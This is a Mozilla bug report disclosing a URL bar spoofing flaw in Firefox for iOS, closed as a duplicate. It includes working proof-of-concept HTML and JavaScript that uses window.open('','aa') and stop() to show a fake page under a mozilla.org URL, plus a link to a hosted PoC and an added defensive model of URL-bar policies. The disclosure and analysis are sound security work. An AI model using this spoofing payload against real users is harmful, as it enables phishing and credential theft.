Closed Bug 1264295 Opened 9 years ago Closed 9 years ago

Firefox For iOS URL Bar Spoofing Vulnerability [Caused by window.open('','aa'); ]

Categories

(Firefox for iOS :: Browser, defect)

Other
iOS
defect

Tracking


RESOLVED DUPLICATE of bug 1263974
Tracking Status
fxios 4.0+ ---
fxios-v3.0 --- affected

People

(Reporter: 1009465756, Unassigned)

References

Details

(Keywords: csectype-spoof, reporter-external, sec-high)

Attachments

(1 file)

Attached image POC-PIC.PNG
User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36

Steps to reproduce:

I found another way to carry out URL bar spoofing in Firefox for iOS. It is different from https://bugzilla.mozilla.org/show_bug.cgi?id=1263974, because it is caused by the JavaScript code: window.open('','aa'); Firefox for iOS doesn't change the URL bar to about:blank when the JavaScript code above executes. Besides, neither Firefox for Android nor Safari has the issue. I think that this issue is more serious than BUG-1263974.

Here is the POC source code:

    <!DOCTYPE HTML>
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    </head>
    <body>
    <!-- Posts to a port that will not answer, into a new named window "aa" -->
    <form action="http://www.mozilla.org:800" target="aa" method="post" onsubmit="setTimeout('p()',1000);">
    <input type="submit">
    </form>
    <script>
    function p() {
      // window.open with an empty URL returns the existing window named "aa" without navigating it
      var t = window.open('','aa');
      t.document.body.innerHTML = '<h1>Fake Mozila Homepage!</h1>';
      t.stop(); // abort the pending load; the bar keeps showing the mozilla.org URL
    }
    </script>
    </body>
    </html>

Here is the online POC: http://1.srcms.applinzi.com/mozilarepro20160413.html

Click the "submit query" to reproduce the problem.

Actual results:

Attackers would have the ability to control the URL shown by the browser; for example, this could be used to easily convince users that they are on a bank's website when they are actually on a phishing page designed to steal their financial information.

Expected results:

1. Never change the URL bar until the full website is loaded.
2. When window.open('','aa'); is executed, create another tab or change the URL bar to about:blank.
Severity: normal → major
Rank: 1
Flags: sec-bounty?
This is conceptually similar to bug 1263974 -- find some way to prevent the new page from loading. The fix for the other bug may fix this. Then again, it might be different enough to be a separate bug.
See Also: → 1263974
Status: UNCONFIRMED → NEW
Ever confirmed: true
Looking into this, both this bug and bug 1263974 are pretty much identical. Both start a request to a URL with a bad port, and the issue is that we show this URL before the page starts to load. I think this can be duped to bug 1263974.
Confirmed that bug 1263974 fixes this test case.
Status: NEW → RESOLVED
Closed: 9 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
Group: firefox-core-security
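Added example, not part of this bug report and not Firefox for iOS code: a toy model of the URL-bar state the comments above describe. It replays the PoC's sequence (page-initiated navigation to a port that never answers, the opener writing into the still-about:blank document it gets back from window.open('','aa'), then stop()) against the behaviour reported here and against a policy that only shows a URL once its navigation has committed. The user-initiated distinction in the hardened policy goes beyond what the bug says and is an assumption about a common browser design; every class and function name here is hypothetical.

```javascript
// Added example for this bug; not Firefox for iOS code. All names are hypothetical.
//
// A navigation passes through three events: start (request sent), commit
// (response arrived, new document replaces the old one) or abort (network
// error, unreachable port, or script calling stop()). The spoof in comment 0
// works when the bar shows the pending URL at "start" while the document in
// the tab is still the old about:blank one, which the opener can write into.

class Tab {
  constructor() {
    this.committedUrl = "about:blank"; // URL of the document actually in the tab
    this.displayedUrl = "about:blank"; // what the user sees in the URL bar
    this.pendingUrl = null;            // navigation in flight, if any
    this.body = "";                    // content of the current document
  }
}

// Policy A, the behaviour reported here: the bar takes the pending URL as
// soon as the request starts, and an abort never revisits it.
const showOnStart = {
  start(tab, url) { tab.pendingUrl = url; tab.displayedUrl = url; },
  commit(tab, body) { tab.committedUrl = tab.pendingUrl; tab.pendingUrl = null; tab.body = body; },
  abort(tab) { tab.pendingUrl = null; }, // bar keeps showing a URL that never loaded
};

// Policy B, hardened: the bar reflects a pending URL only for a navigation the
// user started (typed, bookmark), never for one a page or script started, and
// any abort snaps the bar back to the committed URL. (Assumption: this is a
// common browser design, not something this bug states.)
const showOnCommit = {
  start(tab, url, userInitiated = false) {
    tab.pendingUrl = url;
    tab.displayedUrl = userInitiated ? url : tab.committedUrl;
  },
  commit(tab, body) {
    tab.committedUrl = tab.pendingUrl;
    tab.displayedUrl = tab.committedUrl;
    tab.pendingUrl = null;
    tab.body = body;
  },
  abort(tab) { tab.pendingUrl = null; tab.displayedUrl = tab.committedUrl; },
};

// Replays the PoC sequence from comment 0 against a policy. The named window
// "aa" starts as about:blank; the form submission is a page-initiated
// navigation to a port that never answers; window.open('', 'aa') returns the
// same window without navigating it; the opener writes into its document and
// calls stop(), aborting the pending load.
function replayPoc(policy) {
  const aa = new Tab();
  policy.start(aa, "http://www.mozilla.org:800/", false); // form target="aa"
  aa.body = "<h1>Fake Mozila Homepage!</h1>";             // t.document.body.innerHTML = ...
  policy.abort(aa);                                        // t.stop()
  return { url: aa.displayedUrl, body: aa.body, honest: aa.displayedUrl === aa.committedUrl };
}

// A navigation that does complete, for contrast (constructed page body).
function replayCompletedLoad(policy, userInitiated) {
  const tab = new Tab();
  policy.start(tab, "https://www.mozilla.org/", userInitiated);
  const shownWhilePending = tab.displayedUrl;
  policy.commit(tab, "<h1>constructed page body</h1>");
  return { shownWhilePending, url: tab.displayedUrl, honest: tab.displayedUrl === tab.committedUrl };
}

console.log("reported behaviour:", replayPoc(showOnStart));  // url: the unloaded :800 URL, honest: false
console.log("hardened behaviour:", replayPoc(showOnCommit)); // url: about:blank, honest: true
```

Under the hardened policy the attacker still controls the body of the window, but the bar stays on about:blank, which is exactly the second of the reporter's two expected results; the first (never show a URL until the page has loaded) is the commit rule applied to every navigation, at the cost of not showing a typed URL while it loads.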
